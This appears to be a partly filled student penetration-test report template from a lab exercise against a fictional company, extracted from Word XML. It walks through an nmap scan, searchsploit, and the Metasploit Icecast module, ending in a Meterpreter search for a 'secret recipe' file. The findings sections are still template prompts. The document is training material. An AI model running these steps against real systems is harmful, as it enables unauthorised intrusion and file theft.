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GoodSecurity Penetration Test Report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0563C1"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">JAMESLEE</w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId0">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
            <w:color w:val="0563C1"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="36"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">@GoodSecurity.com</w:t>
        </w:r>
      </w:hyperlink>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7/18/2021</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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High-Level Summary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performing the internal penetration test, there were several alarming vulnerabilities that were</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identified on Hans’ desktop. When performing the attacks, GoodSecurity was able to gain access to his machine and find the secret recipe file by exploit two programs that had major vulnerabilities. The details of the attack can be found in the ‘Findings’ category.</w:t>
      </w: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Nmap command that performs a service and version scan against the target.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Ran nmap -sV 192.168.0.20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previous step, we see that the Icecast service is running. Let's start by attacking that service. Search for any Icecast exploits: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SearchSploit commands to show available Icecast exploits.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Ran searchsploit Icecast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we know which exploits are available to us, let's start Metasploit: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 that starts Metasploit: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Ran msfconsole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for the Icecast module and load it for use.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 to search for the Icecast module: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Ran search Icecast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 to use the Icecast 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Instead of copying the entire path to the module, you can use the number in front of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RHOST to the target machine.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 that sets the RHOST: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Ran set RHOST 192.168.09.20.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Icecast exploit.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 that runs the Icecast exploit.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Ran run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 that performs a search for the secretfile.txt on the target.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Ran search -f *secretfile*.txt.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have a Meterpreter session open.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 to performs a search for the recipe.txt on the target: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Ran search -f *recipe*.txt.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Findings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Machine’s IP address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Actual name of the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Exploited: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 name of the script or Metasploit module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Explain the vulnerability as best you can by explaining the attack type (i.e. is it a heap overflow attack, buffer overflow, file inclusion, etc.?) and briefly summarize what that attack is (Might need Google’s help!)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In your expert opinion, how severe is this vulnerability?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Proof of Concept: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This is where you show the steps you took. Show the client how you exploited the software services. Please include screenshots!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There should be a separate finding for each vulnerability found!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Recommendations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What recommendations would you give to GoodCorp?</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8">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YOURNAMEHERE@GoodSecurity.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